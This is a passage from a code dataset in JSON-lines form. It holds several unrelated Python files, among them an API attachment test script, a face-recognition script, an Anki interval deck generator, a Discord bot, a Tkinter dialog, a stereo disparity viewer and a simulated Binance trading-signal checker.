open('./encoded.txt', 'w+') as f:\n f.write(encoded_string)\n return r\n\ndef downloadAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = data[\"files\"][0][\"files_id\"]\n tempHandleId = json.loads(api.tracking.items.getDownloadAttachment(attachmentId=attachmentId, filesId=filesId))[\"_temp_handle_id\"]\n file_bytes = api.files.download(tempHandleId=tempHandleId)\n with open('out.jpg', 'wb') as f:\n f.write(file_bytes)\n\ndef addAttachmentTesting(trackingId: int, contentType: str, fileName: str):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n with open('./text.txt', 'rb') as f:\n fileBytes = f.read()\n tempHandleId = json.loads(uploadFileTesting(fileBytes=fileBytes, fileType='txt'))[\"fileHandle\"]\n r = api.tracking.items.addAttachment(trackingId=trackingId, tempHandleId=tempHandleId, attachmentId=attachmentId, contentType='text/plain', fileName='text.txt', order=0, filesId=None)\n return r\n\ndef addJpg(trackingId: int, fileName: str):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n with open(fileName, 'rb') as f:\n fileBytes = f.read()\n tempHandleId = json.loads(uploadFileTesting(fileBytes=fileBytes, fileType='jpeg'))[\"fileHandle\"]\n r = api.tracking.items.addAttachment(trackingId=trackingId, tempHandleId=tempHandleId, attachmentId=attachmentId, contentType='image/jpeg', fileName=fileName, order=0, filesId=None)\n return r\n\n \ndef updateAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = 
data[\"files\"][0][\"files_id\"]\n tempHandleId = json.loads(uploadFileTesting(open('./pic.jpg', 'rb').read(), fileType='jpeg'))[\"fileHandle\"]\n r = api.tracking.items.updateAttachment(trackingId=trackingId, attachmentId=attachmentId, filesId=filesId, contentType='image/jpeg', fileName='pic.jpg', order=0, tempHandleId=tempHandleId)\n return r\n\ndef deleteAttachmentTesting(trackingId: int):\n data = json.loads(api.tracking.items.getListAttachments(trackingId=trackingId))\n attachmentId = data[\"_id\"]\n filesId = data[\"files\"][0][\"files_id\"]\n r = api.tracking.items.deleteAttachment(attachmentId=attachmentId, filesId=filesId)\n return r\n\n\nif __name__ == \"__main__\":\n # with open('./out.pdf', 'rb') as f:\n # print(uploadFileTesting(fileBytes=f.read()))\n\n with open('./out.json', 'w+') as f:\n # f.write(contactTesting())\n # f.write(trackingTabTesting())\n # f.write(trackingRecordTesting())\n # f.write(trackingQueueTesting())\n f.write(trackingItemTesting())\n # f.write(formTesting())\n # f.write(reportTesting())\n\n # generatePDFTesting(instanceId=8415)\n\n # downloadAttachmentTesting(trackingId=13052)\n\n # print(addAttachmentTesting(trackingId=13052))\n # print(addJpg(trackingId=13052, fileName='pic.jpg'))\n\n # print(updateAttachmentTesting(trackingId=13052))\n\n # print(deleteAttachmentTesting(trackingId=13052))\n\n pass\n","repo_name":"EssiumLLC/lib-xenqu-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73206397267","text":"import face_recognition\nimport argparse\nimport pickle\nimport cv2\nimport os\nimport sys\nimport csv\nimport numpy as np\n\nif os.path.exists(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\"):\n os.remove(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\")\nelse:\n pass\n\n# input_qvision = sys.argv[1]\n# input_qvision = \"1\"\n# example = \" \"\n# if input_qvision == \"1\":\ncap = cv2.VideoCapture(0)\nfor i in range(1):\n\treturn_value, image = cap.read()\n\tcv2.imwrite(\"/home/biped/catkin_ws/src/jacob/scripts/face_recog/examples/face_recog.png\", image)\ndel(cap)\n\ndata = pickle.loads(open(\"/home/biped/catkin_ws/src/jacob/scripts/face_recog/encodings.pickle\", \"rb\").read())\n\nrgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\nboxes = face_recognition.face_locations(rgb, model=\"hog\")\nencodings = face_recognition.face_encodings(rgb, boxes)\n\nnames = []\n\nfor encoding in encodings:\n matches = face_recognition.compare_faces(data[\"encodings\"], encoding)\n name = \"Unknown\"\n\n if True in matches:\n matchedIdxs = [i for (i, b) in enumerate(matches) if b]\n counts = {}\n for i in matchedIdxs:\n name = data[\"names\"][i] \n counts[name] = counts.get(name, 0) + 1\n name = max(counts, key=counts.get)\n names.append(name)\nif len(names) < 1:\n names.append(\"nobody around\")\nprint(names)\nfor ((top, right, bottom, left), name) in zip(boxes, names):\n cv2.rectangle(image, (left, top), (right, bottom), (0, 255, 0), 2)\n y = top - 15 if top - 15 > 15 else top + 15\n cv2.putText(image, name, (left, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\ncv2.imshow(\"Image\", image)\ncv2.waitKey(0)\n# print(\"done_face_recog\")\nident_result = open(\"/home/biped/catkin_ws/src/jacob/scripts/results/face_ident.csv\", \"w\")\nwriter = 
csv.writer(ident_result)\nwriter.writerow(names)\nident_result.close()\n\n","repo_name":"JacobViertel/Biped","sub_path":"scripts/face_recog/recognize_faces_image.py","file_name":"recognize_faces_image.py","file_ext":"py","file_size_in_byte":1864,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"11195439469","text":"#!/usr/bin/env python3\nimport os.path\nimport sys\nimport re\nimport random\nimport subprocess\nimport argparse\nimport pandas as pd\nimport mingus.core.keys as keys\nimport mingus.core.intervals as intervals\nfrom mingus.containers import Note\nfrom mingus.containers import Bar\nfrom mingus.midi import fluidsynth\nfrom mingus.extra import lilypond\n\n##### IMPORTANT INFO ABOUT MINGUS #####\n#\n# In order for this to work properly, I had to modify a few\n# files in the mingus package. If you have to reinstall or\n# update the environment, you will need to change these things:\n#\n# mingus/midi/fluidsynth.py:\n# Change line 126 from:\n# if not initialized:\n# to:\n# if initialized or not initialized:\n#\n# mingus/extras/lilypond.py:\n# Change line 252 from:\n# command = 'lilypond %s -o \"%s\" \"%s.ly\"' % (command, filename, filename)\n# to:\n# command = 'lilypond -dresolution=200 %s -o \"%s\" \"%s.ly\"' % (command, filename, filename)\n#\n#######################################\n\ndef main(args):\n # Configure the intervals to generate. Each dictionary\n # key is the name of the interval. The first field is\n # the shorthand name, and the second field is the number\n # of Anki notes to generate for that interval.\n interval_config = {\n 'perfect octave': ('1', 2),\n 'minor second': ('b2', 2),\n 'major second': ('2', 2),\n 'minor third': ('b3', 2),\n 'major third': ('3', 2),\n 'perfect fourth': ('4', 2),\n 'tritone (augmented fourth)': ('#4', 1),\n 'tritone (diminished fifth)': ('b5', 1),\n 'perfect fifth': ('5', 2),\n 'minor sixth': ('b6', 2),\n 'major sixth': ('6', 2),\n 'minor seventh': ('b7', 2),\n 'major seventh': ('7', 2),\n }\n # Allow savvy users to ask for rerolls of specific intervals.\n # Best used in conjunction with the --index option.\n if args.config is not None:\n interval_config = {args.config[0]: (args.config[1], int(args.config[2]))}\n # Specify the deck size modifier\n # (Anki notes = count field * size modifier)\n size_modifier = 2\n if args.size == 'short':\n size_modifier = 1\n if args.size == 'long':\n size_modifier = 4\n if args.config is not None:\n size_modifier = 1\n # Specify interval directions\n directions = []\n if args.direction in ['ascending', 'both']:\n directions.append('ascending')\n if args.direction in ['descending', 'both']:\n directions.append('descending')\n # Normalize output directory\n out_dir = os.path.abspath(args.directory)\n\n ## Start Anki note generation\n data = {\n '## Index':[],\n 'Key':[],\n 'Start Note':[],\n 'End Note':[],\n 'Direction':[],\n 'Interval':[],\n 'Sheet Music':[],\n 'Start Sound':[],\n 'End Sound':[],\n 'Interval Sound':[]\n }\n index = args.index\n print(\"\\nGenerating Anki note data...\\n\")\n for interval, (shorthand, count) in interval_config.items():\n for direction in directions:\n for i in range(count*size_modifier):\n data['## Index'].append(index)\n # Generate initial basic fields\n accidentals = round(random.triangular(-7,7,0)) \n key = keys.get_key(accidentals)[0] # Pick random major key, weighted towards 'typical' keys\n start = random.choice(keys.get_notes(key)) # Pick random note from our key\n end = intervals.from_shorthand(start, 
shorthand, direction=='ascending')\n data['Key'].append(key)\n data['Start Note'].append(start)\n data['End Note'].append(end)\n data['Direction'].append(direction)\n data['Interval'].append(interval)\n # Generate sheet music file\n interval_bar = Bar(key)\n start_note = Note(start)\n end_note = Note(start)\n end_note.transpose(shorthand, direction=='ascending')\n if shorthand == '1':\n if direction == 'ascending':\n end_note.octave_up()\n if direction == 'descending':\n end_note.octave_down()\n interval_bar.place_notes(start_note, 2)\n interval_bar.place_notes(end_note, 2)\n sheet_base = \"interval_{0}_sheet.png\".format(index)\n sheet = os.path.join(out_dir, sheet_base)\n lilypond.to_png(lilypond.from_Bar(interval_bar), sheet)\n data['Sheet Music'].append(''.format(sheet_base))\n # Generate audio file names\n start_base = \"interval_{0}_start\".format(index)\n end_base = \"interval_{0}_end\".format(index)\n interval_base = \"interval_{0}_full\".format(index)\n data['Start Sound'].append(\"[sound:{}.mp3]\".format(start_base))\n data['End Sound'].append(\"[sound:{}.mp3]\".format(end_base))\n data['Interval Sound'].append(\"[sound:{}.mp3]\".format(interval_base))\n start_file = os.path.join(out_dir, \"{}.wav\".format(start_base))\n end_file = os.path.join(out_dir, \"{}.wav\".format(end_base))\n interval_file = os.path.join(out_dir, \"{}.wav\".format(interval_base))\n # Generate audio files, 2 seconds per note\n start_bar = Bar(key)\n start_bar.place_notes(start_note, 1)\n end_bar = Bar(key)\n end_bar.place_notes(end_note, 1)\n fluidsynth.init(args.soundfont, file=start_file)\n fluidsynth.play_Bar(start_bar, 1, bpm=120)\n fluidsynth.init(args.soundfont, file=end_file)\n fluidsynth.play_Bar(end_bar, 1, bpm=120)\n fluidsynth.init(args.soundfont, file=interval_file)\n fluidsynth.play_Bar(interval_bar, 1, bpm=60)\n # Increment Anki note index\n index += 1\n print(\"\\n\")\n ## Create text file for Anki note importing\n df = pd.DataFrame(data)\n out_file = os.path.join(out_dir, args.file)\n df.to_csv(out_file, sep=';', index=False, quotechar=\"'\")\n\n ## Final adjustments with bash tools\n # Anki requires fields to be delimited by '; ' not just ';'\n subprocess.run(['sed', '-i', 's/;/; /g', out_file], cwd=out_dir)\n # LilyPond PNG output is one whole page (835x1181px) with footer text\n # We can crop off the bottom of the page to remove the footer,\n # then use the -trim option to remove extra whitespace.\n print(\"Cropping sheet music images...\\n\")\n subprocess.run(\"for f in *.png; do mogrify -crop 835x800+0+0 $f; done\", shell=True, cwd=out_dir)\n subprocess.run(\"for f in *.png; do mogrify -trim $f; done\", shell=True, cwd=out_dir)\n # Convert the FluidSynth output .wav files to .mp3\n print(\"Converting audio files to MP3...\\n\")\n subprocess.run(\"for f in *.wav; do ffmpeg -hide_banner -loglevel warning -i $f -vn -y ${f%.wav}.mp3; done\", shell=True, cwd=out_dir)\n subprocess.run(\"rm -f *.wav\", shell=True, cwd=out_dir)\n print(\"Done! Output in the directory {}\".format(args.directory))\n\nif __name__ == \"__main__\":\n desc = (\"Generates a text file for importing interval training notes into Anki. \"\n \"Also generates the supporting image and audio files for these notes.\")\n epil = (\"Designed for use in bash. 
Requires prior installation of LilyPond, ffmpeg, and imagemagick.\")\n parser = argparse.ArgumentParser(description=desc, epilog=epil)\n parser.add_argument('directory', help=\"A directory to place generated files into.\")\n parser.add_argument('--file', default=\"anki-intervals.txt\",\n help=\"Name of the file containing note information to import into Anki. Default: %(default)s\")\n parser.add_argument('--direction', choices=['ascending', 'descending', 'both'], default='both',\n help=\"Specifies the direction of intervals to generate. Default: %(default)s\")\n parser.add_argument('--size', choices=['default', 'short', 'long'], default='default',\n help=\"Size of the deck to create. Modifies the number of examples per interval. Default: %(default)s\")\n parser.add_argument('--soundfont', default='/home/pwoods/static/soundfonts/GeneralUser_v1.471.sf2',\n help=\"SoundFont file used to initialize FluidSynth. Default: %(default)s\")\n parser.add_argument('--index', default=0, type=int, help=\"Choose a starting index. Don't use unless you know what you're doing.\")\n parser.add_argument('--config', default=None, nargs=3, help=\"Set configuration information. Don't use unless you know what you're doing.\")\n args = parser.parse_args()\n if not os.path.isdir(args.directory):\n sys.exit(\"The specified directory doesn't exist: {}\".format(args.directory))\n main(args)\n\n","repo_name":"philipwoods/scripts-misc","sub_path":"gen-anki-intervals.py","file_name":"gen-anki-intervals.py","file_ext":"py","file_size_in_byte":8998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"38468566673","text":"import settings\r\nimport discord \r\nfrom discord.ext import commands\r\nimport random\r\nlogger = settings.logging.getLogger(\"bot\")\r\n\r\nclass SimpleView(discord.ui.View):\r\n \r\n foo : bool = None\r\n \r\n async def disable_all_items(self):\r\n for item in self.children:\r\n item.disabled = True\r\n await self.message.edit(view=self)\r\n \r\n async def on_timeout(self) -> None:\r\n await self.message.channel.send(\"Timedout\")\r\n await self.disable_all_items()\r\n \r\n @discord.ui.button(label=\"Hello\", \r\n style=discord.ButtonStyle.success)\r\n async def hello(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(\"World\")\r\n self.foo = True\r\n self.stop()\r\n \r\n @discord.ui.button(label=\"Cancel\", \r\n style=discord.ButtonStyle.red)\r\n async def cancel(self, interaction: discord.Interaction, button: discord.ui.Button):\r\n await interaction.response.send_message(\"Cancelling\")\r\n self.foo = False\r\n self.stop()\r\n\r\ndef run():\r\n intents = discord.Intents.all()\r\n bot = commands.Bot(command_prefix=\"!\", intents=intents)\r\n \r\n @bot.event\r\n async def on_ready():\r\n logger.info(f\"User: {bot.user} (ID: {bot.user.id})\")\r\n\r\n @bot.command(\r\n help=\"This is help\",\r\n description=\"This is description\",\r\n brief = \"This is brief\",\r\n enabled=True, \r\n hidden=True\r\n )\r\n async def greet(ctx):\r\n await ctx.send(f\"Hello <@{ctx.author.id}>\")\r\n @bot.command()\r\n async def rand(ctx, *options):\r\n await ctx.send(random.choice(options))\r\n \r\n @bot.command()\r\n async def button(ctx):\r\n view = SimpleView(timeout=50)\r\n # button = discord.ui.Button(label=\"Click me\")\r\n # view.add_item(button)\r\n \r\n message = await ctx.send(view=view)\r\n view.message = message\r\n \r\n await view.wait()\r\n await view.disable_all_items()\r\n \r\n if view.foo 
is None:\r\n logger.error(\"Timeout\")\r\n \r\n elif view.foo is True:\r\n logger.error(\"Ok\")\r\n \r\n else:\r\n logger.error(\"cancel\")\r\n\r\n bot.run(settings.DISCORD_API_SECRET, root_logger=True)\r\nif __name__ == \"__main__\":\r\n run()","repo_name":"AtticusFan/Learn_Python_Fintech","sub_path":"bot/discord_bot.py","file_name":"discord_bot.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"34249721384","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode Tkinter tutorial\n\nIn this script, we use the grid manager\nto create a skeleton of a calculator.\n\nauthor: Jan Bodnar\nlast modified: December 2010\nwebsite: www.zetcode.com\n\"\"\"\n\nfrom Tkinter import Tk, W, E\nfrom ttk import Frame, Button, Label, Style\nfrom ttk import Entry\nfrom pdb import set_trace as debug\n\n\nclass Example(Frame):\n \n def __init__(self, parent):\n Frame.__init__(self, parent) \n \n self.parent = parent\n \n self.initUI()\n \n def initUI(self):\n \n self.parent.title(\"Please enter company name\")\n \n Style().configure(\"TButton\", padding=(0, 20, 0, 20), width=60)\n Style().configure(\"TLabel\", padding=(3, 3, 3, 3))\n Style().configure(\"TEntry\", padding=(0, 5, 0, 5))\n self.columnconfigure(0, pad=3)\n self.columnconfigure(1, pad=3)\n self.columnconfigure(2, pad=3)\n self.columnconfigure(3, pad=3)\n \n self.rowconfigure(0, pad=3)\n self.rowconfigure(1, pad=3)\n self.rowconfigure(2, pad=3)\n self.rowconfigure(3, pad=3)\n self.rowconfigure(4, pad=3)\n self.label = Label(self, text=\"Company Name\")\n self.entry = Entry(self)\n self.entry.grid(row=0, columnspan=4, sticky=W+E)\n cls = Button(self, text=\"OK\", command=self.quit)\n cls.grid(row=1, column=0)\n self.pack()\n\n\ndef ask_company(): \n root = Tk()\n app = Example(root)\n wt = root.winfo_screenwidth()\n ht = root.winfo_screenheight()\n rootsize = (516, 102)\n x = wt/2 - rootsize[0]/2\n y = ht/2 - rootsize[1]/2\n root.geometry(\"%dx%d+%d+%d\" % (rootsize + (x, y)))\n root.lift()\n root.mainloop()\n company = app.entry.get()\n app.quit()\n return(company)\n\n\nif __name__ == '__main__':\n ask_company() ","repo_name":"leetncamp/portal","sub_path":"client/ask.py","file_name":"ask.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19420873051","text":"\r\nclass ComponenteConexo:\r\n def __init__(self, id, lpointsc, lboundaryc, lbbc):\r\n \"\"\"\r\n Constructor\r\n :param id: cantidad de componentes detectados\r\n :param lpointsc: lista con los puntos que definen al componente c\r\n :param lboundaryc: lista con los puntos que definen el borde del componente c\r\n :param lbbc: lista con [x,y,w,h] con x,y representa el punto inicial y w el ancho y h el largo\r\n \"\"\"\r\n self._id = id\r\n self._lpointsc = lpointsc\r\n self._lboundaryc = lboundaryc\r\n self._lbbc = lbbc\r\n\r\n\r\n\r\n","repo_name":"ClaudioMallea/Procesamiento-De-Imagenes-Tarea1","sub_path":"ProcesamientoImagenes/Python/ComponenteConexo.py","file_name":"ComponenteConexo.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73343296466","text":"# -*- coding:utf-8 -*-\r\nimport cv2\r\nimport numpy as np\r\n\r\ndef update(val = 0):\r\n\tglobal disp 
\r\n\tstereo.setBlockSize(cv2.getTrackbarPos('window_size','disparity'))\r\n\tstereo.setUniquenessRatio(cv2.getTrackbarPos('uniquenessRatio','disparity'))\r\n\tstereo.setSpeckleWindowSize(cv2.getTrackbarPos('speckleWindowSize','disparity'))\r\n\tstereo.setSpeckleRange(cv2.getTrackbarPos('speckleRange','disparity'))\r\n\tstereo.setDisp12MaxDiff(cv2.getTrackbarPos('disp12MaxDiff','disparity'))\r\n\r\n\tdisp = stereo.compute(imgL,imgR).astype(np.float32) / 16.0\r\n\r\nwindow_size = 8\r\nmin_disp = 16\r\nnum_disp = 192- min_disp\r\nbolckSize = window_size\r\nuniquenessRatio = 0\r\nspeckleRange = 13\r\nspeckleWindowSize = 0\r\ndisp12MaxDiff = 200\r\nP1 = 600\r\nP2 = 2400\r\n\r\ncv2.namedWindow('disparity')\r\ncv2.createTrackbar('speckleRange','disparity',speckleRange,50,update)\r\ncv2.createTrackbar('window_size','disparity',window_size,21,update)\r\ncv2.createTrackbar('speckleWindowSize','disparity',speckleWindowSize,200,update)\r\ncv2.createTrackbar('uniquenessRatio','disparity',uniquenessRatio,50,update)\r\ncv2.createTrackbar('disp12MaxDiff','disparity',disp12MaxDiff,250,update)\r\n\r\n\r\ncap1 = cv2.VideoCapture(0)\r\ncap2 = cv2.VideoCapture(1)\r\nsign = cap1.isOpened() and cap2.isOpened()\r\nif (sign == False):\r\n print(\"相机打开失败!\")\r\n\r\n\r\nwhile(sign):\r\n\tret1,imgL = cap1.read() #普通相机读取视频帧\r\n\tret2,imgR = cap2.read()\t #红外相机读取视频帧\t\r\n\tif not (ret1 and ret2):\r\n\t\tbreak\r\n\t\r\n\t# imgL = cv2.cvtColor(imgL, cv2.COLOR_BGR2GRAY)\r\n\r\n\tstereo = cv2.StereoSGBM_create(\r\n\t\tminDisparity = min_disp,\r\n\t\tnumDisparities = num_disp,\r\n\t\tblockSize = window_size,\r\n\t\tuniquenessRatio = uniquenessRatio,\r\n\t\tspeckleRange = speckleRange,\r\n\t\tspeckleWindowSize = speckleWindowSize,\r\n\t\tdisp12MaxDiff = disp12MaxDiff,\r\n\t\tP1 = P1,\r\n\t\tP2 = P2 \r\n\t)\t\r\n\tupdate()\r\n\r\n\t# cv2.imshow('normal',imgl)\r\n\tcv2.imshow('left',imgL)\r\n\tcv2.imshow('right',imgR)\r\n\tcv2.imshow('disparity',(disp - min_disp)/num_disp)\r\n\r\n\tif cv2.waitKey(15) & 0xff == ord('q'):\r\n\t\tbreak\r\n\r\ncap1.release()\r\ncap2.release()\r\ncv2.destroyAllWindows()\r\n\r\n\r\n\r\n","repo_name":"SuHaoXD/Face-Anti-spoofing-with-Binocular-Camera","sub_path":"活体检测V2/深度图V2.py","file_name":"深度图V2.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28825578564","text":"import json\nimport time\n\nimport numpy\n\nfrom datetime import datetime\nfrom collections import deque\n\nimport BinanceRestLib\n\nclass TradingChecker(object):\n #TODO: use other time interval instead the fixed 1m\n init_interval = '15m'\n #TODO: replace 300 also with a parameter related to running_interval\n running_interval = '5m'\n interval_factor = 3\n\n init_limit = 100\n\n # Static parameters for volumn comparision\n record_factor = 5\n record_number = 3\n\n # Static parameter for exponential decrease function\n # set 1.2 firstly, so that the record will be reduced to 1/4 after 7.6 min.\n alpha = 1.1\n\n # Test coins\n symbol_vol = 0\n coin_vol = 0.1\n\n def __init__(self, symbol):\n # Save the symbol name\n self.symbol = symbol\n \n # Save all average values\n self.average = self.calcuAverageValue(symbol)\n # reduce the volumn average based on 5m\n self.average[5] = self.average[5]/self.interval_factor \n\n # save the trading volum based on current credit\n self.trading_vol = self.initTradingVolumn(symbol)\n\n # use average close price as the beginnng last price\n self.last_price = self.average[4]\n\n print(self.average)\n 
print(self.trading_vol)\n\n # Create a dict for record volumn\n self.record_vol = deque(maxlen=self.record_number)\n\n # save the current timestamp to keep 1 min cyclic\n self.last_timestamp = time.time()\n\n def initTradingVolumn(self, symbol):\n # get the current price with the init trading volumn\n price = BinanceRestLib.getCurrentPriceTicker(symbol[:-3], symbol[-3:])\n # calculate the needed trading volumn\n volumn = {}\n volumn['buy'] = self.coin_vol/price\n volumn['sell'] = self.coin_vol/price\n return volumn\n\n def calcuAverageValue(self, symbol):\n param = {}\n param['symbol'] = symbol\n param['interval'] = self.init_interval\n param['limit'] = self.init_limit\n\n result = BinanceRestLib.getService('klines', param)\n print(result)\n\n # Use numpy to transfer the data to matrix in order to simplify the further work\n R = numpy.array(result).astype(numpy.float)\n # Calculate the average value for the whole data\n # Because each sublist in result is recognized as a column in numpy matrix, therefore calculate the average value with axis 0\n Avg = numpy.mean(R,axis=0)\n \n return Avg\n\n def checkTradingChance(self):\n param = {}\n param['interval'] = self.running_interval\n param['limit'] = 1\n param['symbol'] = self.symbol\n\n result = BinanceRestLib.getService('klines', param)[0]\n print(self.symbol, \"---------------------------\")\n # print(result)\n\n # update the average values\n # in order to save the memory space, use a weighted moving averag to simulate the simple moving average, \n # so that the weight of the very beginning data can be ignored after several times of the average update\n factor =0.975\n result_float = numpy.array(result).astype(numpy.float)\n self.average = self.average*factor + result_float*(1-factor) \n # print(self.average)\n\n if self.isBuyChance(self.symbol, result_float):\n # get current price\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n\n # check whether the current price is bigger than the last close price\n if float(price['asks_vol']) > self.last_price:\n # record the information\n file_out = open('TradingInfo.log','a')\n file_out.write(str(datetime.fromtimestamp(time.time())))\n file_out.write(\"Find buy change for: \" + self.symbol + '\\n')\n # save data with \"average | current\"\n file_out.write(\"Open Price: \" + str(self.average[1]) + \" | \" + result[1] + '\\n')\n file_out.write(\"Close Price: \" + str(self.average[4]) + \" | \" + result[4] + '\\n')\n file_out.write(\"Trading Volumn: \" + str(self.average[5]) + \" | \" + result[5] + '\\n')\n # save current price\n file_out.write(\"Current price: \" + str(price['asks_vol']) + '\\n')\n # save volumn record\n file_out.write(\"Saved Volumn: \")\n for i in range(self.record_number):\n file_out.write(\"[\" + str(self.record_vol[i][0]) + \", \" + str(self.record_vol[i][1]) + \"], \")\n file_out.write(\"\\n\")\n\n file_out.close()\n\n print(str(datetime.fromtimestamp(time.time())))\n print(\"Find buy change for: \" + self.symbol + '\\n')\n # save data with \"average | current\"\n print(\"Open Price: \" + str(self.average[1]) + \" | \" + result[1] + '\\n')\n print(\"Close Price: \" + str(self.average[4]) + \" | \" + result[4] + '\\n')\n print(\"Trading Volumn: \" + str(self.average[5]) + \" | \" + result[5] + '\\n')\n # save current price\n print(\"Current price: \" + str(price['asks_vol']) + '\\n')\n # save volumn record\n print(\"Saved Volumn\", end=\": \" )\n for item in self.record_vol:\n print(item[0], \", \", item[1], end=\" | \")\n print()\n\n 
self.last_price = float(price['asks_vol'])\n self.last_timestamp = time.time()\n self.simulateBuy()\n # clean the record\n self.record_vol = deque(maxlen=self.record_number)\n\n # update history price with close price in last candle whatever buy or not\n self.last_price = result_float[4]\n\n def isBuyChance(self, symbol, result):\n # The checking rule is constructed by two parts:\n # 1. the current price must be higher than the last candle data (moved out of this function)\n # 2. there must be a continually increase of the trading volumn\n # In order to implement 2, following condition should be filled:\n # 2a. if trading volumn is n times bigger than average, the timestamp and volumn will be recorded\n # 2b. the recorded trading volumn will be added together with a weight factor\n # 2c. this weight factor is reduced very fast along the time (divide 1.5^time diff)\n # 2d. trading volumn condition is satisfied, if m volumn is recorded and the weighted average of them are still n times bigger than average\n # 2e. the recorded volumn will be removed, if it times weight factor is smaller than average volumn\n\n\n if len(self.record_vol)>0:\n print(self.record_vol)\n\n # 2a: if trading volumn is n times bigger than average\n if result[5] > self.average[5]*self.record_factor:\n print(\"Before volumn check: \")\n print(self.record_vol)\n\n # save how many times is the recorded volumn and the recording timestamp\n record = [result[5]/self.average[5], time.time()]\n\n self.record_vol.append(record)\n # # check how many records are already exists. Remove the left one if the size is over defined\n # if len(self.record_vol) > self.record_number:\n # self.record_vol.popleft()\n\n # update record volumn\n for i in range(len(self.record_vol)):\n # calculate time diff in minute\n time_diff = int((time.time() - self.record_vol[i][1])/300)\n # 2b,2c: recalculate the reocred volumn (factor) with a exponential function\n #TODO: more exact definition should be done for the decrease factor\n self.record_vol[i][0] = self.record_vol[i][0]/(self.alpha**time_diff)\n\n print(\"Between volumn check: \")\n print(self.record_vol)\n\n # 2e: remove all record smaller than average (saved factor smaller than 1)\n self.record_vol = [x for x in self.record_vol if x[0]>1]\n\n print(\"After volumn check: \")\n print(self.record_vol)\n\n # 2d: compare the record average with pre-defined record factor; check whether enough record is colleected\n weighted_avg = 0\n if len(self.record_vol)>=self.record_number:\n weighted_avg = (numpy.mean(self.record_vol, axis=0)/len(self.record_vol))[0]\n \n print(\"Weigth is: \", weighted_avg)\n\n if weighted_avg > self.record_factor:\n return True\n else:\n return False\n\n return False\n\n def simulateBuy(self):\n file_out = open('TradingInfo.log','a')\n # loop until reach the target sell price\n while True:\n price = BinanceRestLib.getCurrentPrice(self.symbol[:-3], self.symbol[-3:], self.trading_vol)\n if float(price['bids_vol'])>self.last_price*1.1:\n file_out.write(\"Target Price is reached!!! \\n\")\n file_out.write(\"Simulate sell the coin with price: \" + str(price['bids_vol']) + \"\\n\")\n break\n\n # if the price is never go through the wish one\n if time.time() - self.last_timestamp > 18000:\n file_out.write(\"Price is not reached......... 
\\n\")\n file_out.write(\"Current price is: \" + str(price['bids_vol']) + \"\\n\")\n break\n\n # Save price\n file_out.write(str(datetime.now()))\n file_out.write(\" | \" + str(price['bids_vol']) + \"\\n\")\n time.sleep(60)\n\n file_out.close()\n\n# Save trading data for further test\ndef createSaveTestData(symbol):\n test_data_save_name = \"TestData_\" + symbol + \"_\" + datetime.now().strftime(\"%Y_%m_%d_%H_%M\") \n test_file = open(test_data_save_name, 'a')\n test_file.write(\"[\")\n return test_file\n \n# symbol_list = ['ICXETH', 'EOSETH']\n\nsymbol_list = ['ADAETH','ADXETH','AEETH','AIONETH','AMBETH','APPCETH','ARKETH','ARNETH','ASTETH',\n'BATETH','BCCETH','BCDETH','BCPTETH','BLZETH','BNBETH','BNTETH','BQXETH','BRDETH','BTGETH','BTSETH',\n'CDTETH','CHATETH','CMTETH','CNDETH','CTRETH','DASHETH','DGDETH','DLTETH','DNTETH','EDOETH','ELFETH',\n'ENGETH','ENJETH','EOSETH','ETCETH','EVXETH','FUELETH','FUNETH','GTOETH','GVTETH','GXSETH','HSRETH',\n'ICNETH','ICXETH','INSETH','IOSTETH','IOTAETH','KMDETH','KNCETH','LENDETH','LINKETH','LRCETH','LSKETH',\n'LTCETH','LUNETH','MANAETH','MCOETH','MDAETH','MODETH','MTHETH','MTLETH','NANOETH','NAVETH','NCASHETH',\n'NEBLETH','NEOETH','NULSETH','OAXETH','OMGETH','ONTETH','OSTETH','PIVXETH','POAETH','POEETH','POWRETH',\n'PPTETH','QSPETH','QTUMETH','RCNETH','RDNETH','REQETH','RLCETH','RPXETH','SALTETH','SNGLSETH','SNMETH',\n'SNTETH','STEEMETH','STORJETH','STORMETH','STRATETH','SUBETH','TNBETH','TNTETH','TRIGETH','TRXETH','VENETH',\n'VIAETH','VIBETH','VIBEETH','WABIETH','WAVESETH','WINGSETH','WTCETH','XLMETH','XMRETH','XRPETH','XVGETH',\n'XZCETH','YOYOETH','ZECETH','ZILETH','ZRXETH']\n\nprint(len(symbol_list))\n\ntestlist = {}\n\nbegin_time = time.time()\n\n\nprint(time.time())\n\nfor symbol in symbol_list:\n print(\"Creation of the object \", symbol)\n testlist[symbol] = TradingChecker(symbol)\n\nend_time = time.time()\ntime.sleep(end_time-begin_time)\n\nwhile True:\n begin_time = time.time()\n\n for test in testlist:\n 